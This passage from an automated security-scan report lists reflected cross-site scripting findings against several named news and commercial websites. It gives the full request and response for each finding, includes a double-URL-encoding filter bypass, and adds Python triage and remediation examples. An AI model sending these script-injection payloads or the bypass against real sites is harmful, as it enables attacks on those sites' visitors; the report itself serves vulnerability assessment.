P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-37937282_1304437409","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-37937282_1304437409,11fda490648f83c6cbe0';alert(1)//498261d4339&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2C
...[SNIP]...

6.127. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b847"><script>alert(1)</script>b3c95de9fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 361
Location: http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8">
...[SNIP]...

6.128. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36b93<script>alert(1)</script>f929a837cc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36b93<script>alert(1)</script>f929a837cc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 357
Location: http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>f929a837cc8">http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8</a>
...[SNIP]...

6.129. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99560"><script>alert(1)</script>0b27b877563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?99560"><script>alert(1)</script>0b27b877563=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 367
Location: http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache3.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache3.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1">
...[SNIP]...

6.130. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a78f<script>alert(1)</script>61417a57cf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 363
Location: http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>61417a57cf2=1">http://adaeveningnews.com/favicon.ico?5a78f<script>alert(1)</script>61417a57cf2=1</a>
...[SNIP]...

6.131. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 46a02<script>alert(1)</script>d57d740c7bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico46a02<script>alert(1)</script>d57d740c7bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:37 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico46a02<script>alert(1)</script>d57d740c7bb
Content-Type: text/html
Content-Length: 1287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<P class=extra>The file specified (/favicon.ico46a02<script>alert(1)</script>d57d740c7bb) has been moved to <A href="http://recorta.com/abriendo.html/favicon.ico46a02<script>
...[SNIP]...
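Added example, not part of the scanner output: a triage check for the redirect caveat stated in the issue detail above. The check parses a raw HTTP response, records whether the payload appears in the body and in the Location header, and downgrades the verdict when the response is a 3xx with a Location header, since the browser follows the redirect rather than rendering the body. REDIRECT_SAMPLE is the 6.131 response from this report trimmed to its headers and the body fragment the report shows; RENDERED_SAMPLE is a constructed 200 response, not taken from the report, included only for contrast.

```python
# Added triage helper for reflections that land in HTTP redirect responses.
PAYLOAD = "46a02<script>alert(1)</script>d57d740c7bb"   # payload from 6.131


def _response(status_line, headers, body):
    """Assemble a raw HTTP response (CRLF line endings, blank line, body)."""
    head = "".join(f"{name}: {value}\r\n" for name, value in headers)
    return f"{status_line}\r\n{head}\r\n{body}"


# The 6.131 response, trimmed to the headers and body fragment shown in the report.
REDIRECT_SAMPLE = _response(
    "HTTP/1.1 301 Moved Permanently",
    [("Date", "Tue, 03 May 2011 10:47:37 GMT"),
     ("Server", "tigershark/3.0.128 (dn-fh23.directnic.com)"),
     ("Location", f"http://recorta.com/abriendo.html/favicon.ico{PAYLOAD}"),
     ("Content-Type", "text/html")],
    f"<P class=extra>The file specified (/favicon.ico{PAYLOAD}) has been moved to "
    f'<A href="http://recorta.com/abriendo.html/favicon.ico{PAYLOAD}">',
)

# Constructed for contrast only: a non-redirect HTML response echoing the same payload.
RENDERED_SAMPLE = _response(
    "HTTP/1.1 200 OK",
    [("Content-Type", "text/html")],
    f"<html><body>Not found: /favicon.ico{PAYLOAD}</body></html>",
)


def parse_response(raw):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def triage(raw, payload):
    """Classify where the payload is reflected and whether the browser would render it."""
    status, headers, body = parse_response(raw)
    is_redirect = 300 <= status < 400 and "location" in headers
    is_html = headers.get("content-type", "").lower().startswith("text/html")
    result = {
        "status": status,
        "is_redirect": is_redirect,
        "in_body": payload in body,
        "in_location": payload in headers.get("location", ""),
    }
    if not result["in_body"]:
        result["verdict"] = "not reflected in body"
    elif is_redirect:
        result["verdict"] = ("redirect body: the browser follows Location and normally never "
                             "renders this body; low practical impact unless the redirect "
                             "can be suppressed")
    elif is_html:
        result["verdict"] = "rendered HTML: the payload reaches the browser's HTML parser"
    else:
        result["verdict"] = "non-HTML body: rendering depends on the declared Content-Type"
    return result


if __name__ == "__main__":
    for label, sample in (("6.131 (301)", REDIRECT_SAMPLE), ("constructed 200", RENDERED_SAMPLE)):
        print(label, triage(sample, PAYLOAD))
```

The in_location field is recorded because, in every redirect issue in this section, the same unencoded payload is also copied into the Location header; the check does not draw any conclusion from that beyond noting it for the analyst.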

6.132. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ac2"><script>alert(1)</script>67dcf517012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36ac2"><script>alert(1)</script>67dcf517012 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:33 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012
Content-Type: text/html
Content-Length: 1293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...
<A href="http://recorta.com/abriendo.html/favicon.ico36ac2"><script>alert(1)</script>67dcf517012">
...[SNIP]...

6.133. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 was submitted in the REST URL parameter 1. This input was echoed as d64ef"><script>alert(1)</script>3131ff19525 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
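Added example, not code from the scanner or from the site: the double-URL-decoding bypass described in the issue detail and the remediation above, modelled in Python. PAYLOAD is the scanner's payload from this issue. The two handler functions, the blocked-character set and the canonicalise helper are assumptions about how such an application behaves, written to reproduce the echoed value the report records; the URL prefix is the one from the recorded response.

```python
from urllib.parse import unquote
import html

# Added example: payload recorded for 6.133 (the scanner's random marker strings kept as-is).
PAYLOAD = "d64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525"

# Assumed filter: the characters the application was observed to reject when sent directly.
BLOCKED = set('<>"\'')


def contains_blocked(value: str) -> bool:
    return any(ch in BLOCKED for ch in value)


def canonicalise(value: str, max_rounds: int = 5) -> str:
    """URL-decode until the value stops changing, so that every layer of encoding
    the application might later strip is removed before validation runs.
    Bounded so a pathological input cannot loop indefinitely."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("value does not reach a fixed point under URL-decoding")


def vulnerable_handler(segment: str) -> str:
    """Observed pattern (assumed implementation): the web server decodes once, the
    filter runs, then the application decodes a second time and writes the result
    into a double-quoted HREF. The second decode re-creates the rejected characters."""
    once = unquote(segment)          # the web server's single decode
    if contains_blocked(once):
        return "rejected"
    twice = unquote(once)            # redundant application-level decode
    return f'<a HREF="http://nextbigfuture.com/favicon.ico{twice}">here</a>'


def hardened_handler(segment: str) -> str:
    """Remediation from the report: validate only after canonicalisation is complete,
    and encode for the HTML attribute context at output time."""
    value = canonicalise(segment)
    if contains_blocked(value):
        return "rejected"
    return f'<a href="http://nextbigfuture.com/favicon.ico{html.escape(value, quote=True)}">here</a>'


if __name__ == "__main__":
    print("vulnerable:", vulnerable_handler(PAYLOAD))
    print("hardened:  ", hardened_handler(PAYLOAD))
```

Run against PAYLOAD, vulnerable_handler emits exactly the `<a HREF="...favicon.icod64ef"><script>alert(1)</script>3131ff19525">here</a>` line recorded in the response below, while hardened_handler rejects it because the filter now sees the fully decoded value; a single-encoded payload is rejected by both.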

Request

GET /favicon.icod64ef%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3131ff19525 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash05
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.icod64ef"><script>alert(1)</script>3131ff19525">here</a>.</body>

6.134. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a4bb"><script>alert(1)</script>a355b28398e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Tue, 03 May 2011 10:20:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?7a4bb"><script>alert(1)</script>a355b28398e=1">here</a>.</body
...[SNIP]...

6.135. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.russianeuro.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fddd"><script>alert(1)</script>456541e7a00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?8fddd"><script>alert(1)</script>456541e7a00=1">http://www.russiancupid.com/favico
...[SNIP]...

6.136. http://www.russianeuro.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.russianeuro.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5b9bd<script>alert(1)</script>e449a91ea2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.russianeuro.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:57:35 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1">http://www.russiancupid.com/favicon.ico?5b9bd<script>alert(1)</script>e449a91ea2e=1</a>
...[SNIP]...

6.137. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d545<script>alert(1)</script>288d9a81df7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico6d545<script>alert(1)</script>288d9a81df7 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 343
Location: http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>288d9a81df7">http://timeswv.com/favicon.ico6d545<script>alert(1)</script>288d9a81df7</a>
...[SNIP]...

6.138. http://www.timeswv.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50cf"><script>alert(1)</script>fb103432d52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.icod50cf"><script>alert(1)</script>fb103432d52 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:03 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 347
Location: http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:03 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon.icod50cf"><script>alert(1)</script>fb103432d52">
...[SNIP]...

6.139. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeswv.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f172<script>alert(1)</script>8cbe816c7f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.timeswv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 10:35:00 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 349
Location: http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 11:35:00 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent3.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://timeswv.com/favicon
...[SNIP]...
</script>8cbe816c7f5=1">http://timeswv.com/favicon.ico?4f172<script>alert(1)</script>8cbe816c7f5=1</a>
...[SNIP]...

6.140. http://www.timeswv.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
